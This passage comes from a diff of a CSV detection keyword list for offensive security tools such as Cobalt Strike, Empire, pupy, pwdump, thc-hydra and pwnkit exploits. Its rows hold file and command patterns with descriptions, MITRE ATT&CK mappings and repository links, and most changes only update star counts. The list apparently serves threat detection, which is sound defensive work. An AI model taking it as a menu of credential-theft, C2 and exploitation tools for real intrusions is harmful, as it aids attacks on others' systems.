TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*purplepanda_github.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_NEO4J_URL=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*purplepanda_prints.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_PWD=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" -"*PurpleSharp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*PurpleSharp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*putterpanda_whoami*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*puttygen.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*puzzlepeaches/NTLMRecon*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*PWCrack*","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","5","456","57","2023-09-27T08:26:21Z","2018-07-01T08:33:55Z" "*pwd*/*/rules/best64.rule*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*pwd_dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*pwd_dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*PWDump.*","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. 
This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1027 - T1055 - T1056 - T1059 - T1078 - T1087 - T1098 - T1110 - T1212 - T1547","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pwdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*-PWDumpFormat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*pw-inspector -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*pw-inspector.*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*-PWDumpFormat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*pw-inspector -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*pw-inspector.*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to 
attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*pwn_jenkins*","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","10","1681","298","2023-03-09T09:16:14Z","2018-07-18T14:24:27Z" "*pwn1sher/CS-BOFs*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*pwn1sher/WMEye*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation 
tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" -"*pwnagotchi*","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","6215","976","2023-07-25T00:15:21Z","2019-09-19T13:07:15Z" +"*pwn3d_label = Pwn3d!*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*pwnagotchi*","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","6219","976","2023-07-25T00:15:21Z","2019-09-19T13:07:15Z" "*pwnat.exe*","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. 
is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","10","2861","456","2023-08-08T05:09:00Z","2012-08-10T05:55:11Z" "*pwncat-cs *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*pwncat-cs -lp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -15385,13 +15554,13 @@ "*pwndrop stop*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-linux-amd64*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-master*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" -"*pwned_x64/notepad.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Pwned-creds_Domainpasswordspray.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*pwned_x64/notepad.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Pwned-creds_Domainpasswordspray.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*pwned-passwords-ntlm*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*pwnkit *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*pwnkit64decoded.c*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*pwnsauc3/RWXFinder*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX 
section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" -"*pwsafe2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pwsafe2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*pxethief *","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*pxethief.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*pycobalt.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
@@ -15401,13 +15570,14 @@ "*pycobalt_python*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_timeout*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 
- TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pydictor*","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","10","2936","618","2023-01-11T13:02:06Z","2016-08-17T08:16:56Z" -"*pyexec -c *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*pyexec --file*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pyexec -c *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pyexec --file*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
